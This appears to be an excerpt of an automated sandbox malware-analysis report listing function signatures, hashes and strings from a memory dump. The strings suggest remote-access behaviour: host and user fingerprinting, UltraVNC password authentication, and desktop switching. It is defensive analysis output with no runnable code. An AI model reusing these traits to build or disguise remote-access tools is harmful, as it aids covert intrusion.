                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (IA64 Processor)$Current user :
                                                      • API String ID: 171970310-1812746349
                                                      • Opcode ID: 86bfd3a467f30a8a258fb3e85ac81f233c0839e1a4daaf24cbd739d77d4b70d4
                                                      • Instruction ID: d7bba2787fea4f7953ea8df112a7759608b0f918d887dcc8d6c5d6f1f91b8d07
                                                      • Opcode Fuzzy Hash: 86bfd3a467f30a8a258fb3e85ac81f233c0839e1a4daaf24cbd739d77d4b70d4
                                                      • Instruction Fuzzy Hash: 0AB17121A2868685E774DB3598002F977A0FF05770F805376EA7E87BD5EE28F555C320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha64 Processor)$Current user :
                                                      • API String ID: 171970310-1760265636
                                                      • Opcode ID: 8896173faf4fc177a5d62b3271f1ef0a6d32a223d2c10bc8d06557924221250b
                                                      • Instruction ID: 6332867feaf16160bc42c26999df4f736eae69b951ca8f2509ce6e5ce958ec41
                                                      • Opcode Fuzzy Hash: 8896173faf4fc177a5d62b3271f1ef0a6d32a223d2c10bc8d06557924221250b
                                                      • Instruction Fuzzy Hash: 1FB18121A2868685EB74DB3598002F9B7A0FF057B4F805336EA7D87BD5EE28F555C320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Intel Processor)$Current user :
                                                      • API String ID: 171970310-3029765189
                                                      • Opcode ID: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
                                                      • Instruction ID: 184523628eed31d7063da1e244d60d86e52c953b5b96454e249513b72fc98e43
                                                      • Opcode Fuzzy Hash: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
                                                      • Instruction Fuzzy Hash: C8B19321A2868685EB74DB3598002F977A0FF057B0F805376E67E87BD5EE28F545C320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha Processor)$Current user :
                                                      • API String ID: 171970310-733379141
                                                      • Opcode ID: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
                                                      • Instruction ID: 03a773dbe62528aab26b3a27dc75544d89e672d26aac9f8f16473e57ad466550
                                                      • Opcode Fuzzy Hash: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
                                                      • Instruction Fuzzy Hash: 8BB19321A2868685EB74DB3598002F977A0FF057B0F805336E67E87BD5EE28F545C320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (ARM Processor)$Current user :
                                                      • API String ID: 171970310-978419383
                                                      • Opcode ID: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
                                                      • Instruction ID: 43607a9317e58249953e1f0308c7354cc351c47830572046719a7aa5a8811854
                                                      • Opcode Fuzzy Hash: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
                                                      • Instruction Fuzzy Hash: D6B18221A2868685EB74DB3598002F977A0FF057B0F805376EA7E87BD5EE28F555C320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (SHX Processor)$Current user :
                                                      • API String ID: 171970310-3227166451
                                                      • Opcode ID: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
                                                      • Instruction ID: abe541a0c1054e755e9c6c169b2515b961ffbd8277ffc9fa8cf632933f1ddb48
                                                      • Opcode Fuzzy Hash: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
                                                      • Instruction Fuzzy Hash: 50B18221A2868685EB74DB3598002F977A0FF057B0F805376EA7E87BD5EE28F555C320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (AMD64 Processor)$Current user :
                                                      • API String ID: 171970310-4243357635
                                                      • Opcode ID: 03aacd0ad6e6d9707dfc08155cf451b10a2e0ac72c3257671f52e65d8e606d50
                                                      • Instruction ID: 22bc4e548aea7236e9bdf459b009275bdf98e33576b3bbc408c8b13117094c2c
                                                      • Opcode Fuzzy Hash: 03aacd0ad6e6d9707dfc08155cf451b10a2e0ac72c3257671f52e65d8e606d50
                                                      • Instruction Fuzzy Hash: 20B19321A2868685EB74DB3598002F9B7A0FF057B0F805336E67E87BD5EE28F555C320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (PPC Processor)$Current user :
                                                      • API String ID: 171970310-3099718995
                                                      • Opcode ID: 6c4329df222d5528f2f071fd5f1073a2ca0bc00249f98637d5c349aac7834982
                                                      • Instruction ID: f64da870c5136e5ded79531315cd282e21f14cf058ce357b883b4fe39f766940
                                                      • Opcode Fuzzy Hash: 6c4329df222d5528f2f071fd5f1073a2ca0bc00249f98637d5c349aac7834982
                                                      • Instruction Fuzzy Hash: 94B18221A2868685EB74DB3598002F977A0FF057B0F805336EA7E87BD5EE28F545C320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Desktop$MessageThread$CloseCurrentDispatchInformationInputObjectOpenTranslateUser
                                                      • String ID: black_layered.cpp : !GetUserObjectInformation $black_layered.cpp : OpenInputdesktop Error $black_layered.cpp : OpenInputdesktop OK$black_layered.cpp : SelectHDESK to %s (%x) from %x$black_layered.cpp : SelectHDESK:!SetThreadDesktop $black_layered.cpp : end BlackWindow
                                                      • API String ID: 2763862709-1375279643
                                                      • Opcode ID: 97dc65336ba64628ca373ffe4e0f0f58b485fa95820c520cbe5a523dd1110f8f
                                                      • Instruction ID: f92267d4fa37230aaf68124dbb0a1dd2d7df8b9ed194287c2c3f7ff5365a78cf
                                                      • Opcode Fuzzy Hash: 97dc65336ba64628ca373ffe4e0f0f58b485fa95820c520cbe5a523dd1110f8f
                                                      • Instruction Fuzzy Hash: 2841F761A38A8391FA20AB35B8546FAF3B1FF89754FC46032D54E467A4DE3CF1498760
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc$Sleep$DebugErrorLastOutputStringsprintf
                                                      • String ID: LockWorkStation$LockWorkstation failed with error 0x%0X$WinStationConnectW$user32.dll$winsta.dll
                                                      • API String ID: 2931780912-670137772
                                                      • Opcode ID: 4c941a38a0d861067d34bbbc45676cf3eae1c23976c0e3f2b532e901046bab96
                                                      • Instruction ID: 7324e497374fdf4d2a0209ff9d2a3bc15013ef1cec918992947f3917b1106f1b
                                                      • Opcode Fuzzy Hash: 4c941a38a0d861067d34bbbc45676cf3eae1c23976c0e3f2b532e901046bab96
                                                      • Instruction Fuzzy Hash: 8E311425A38A4282EA65AF31E9552B9F3B6FF85B84FC42031DE0E46764DF2CF4458660
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errnofree$CriticalSectionTime_callnewh_getptdmalloc$AllocCurrentEnterFileHeapLeaveProcessSystemrand
                                                      • String ID: View-only password authentication$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$password authentication$vncclient.cpp : Failed to receive challenge response from client$vncclient.cpp : Failed to send challenge to client
                                                      • API String ID: 3991686958-188493154
                                                      • Opcode ID: 9d379260281130677ec767493c4a79257c318867dcb6e5a486f079a26b47f014
                                                      • Instruction ID: 464ddbb33c09a88324999079cc17dd98e310167c865425211650d6c7b4c27f63
                                                      • Opcode Fuzzy Hash: 9d379260281130677ec767493c4a79257c318867dcb6e5a486f079a26b47f014
                                                      • Instruction Fuzzy Hash: 64B1C222B2864285FB24FB35D8552FDB3A1EF86B58F845232DA1E477D5EE38E405C360
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Rect$CombineDeleteObjectfree$CreateDataRegion$ErrorFreeHeapLast_errnomalloc
                                                      • String ID:
                                                      • API String ID: 2853843867-0
                                                      • Opcode ID: 7aa13fe935640deb479e886ec7f566d84b1648c63b6ef7921255f0d22633ce45
                                                      • Instruction ID: 9f24aaf7e2c5b243704e7a97056ba898e0319b4647691e21a37a387dec4326cc
                                                      • Opcode Fuzzy Hash: 7aa13fe935640deb479e886ec7f566d84b1648c63b6ef7921255f0d22633ce45
                                                      • Instruction Fuzzy Hash: 7EE1A436A28A8186EB60EB75E4446EDB7B2FF89B84F805035EE4D53B54DF38E445CB10
                                                      APIs
                                                      Strings
                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF790C469A4
                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF790C469F2
                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF790C46BB2
                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF790C46A0B
                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF790C4695B
                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF790C46A39
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
                                                      • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
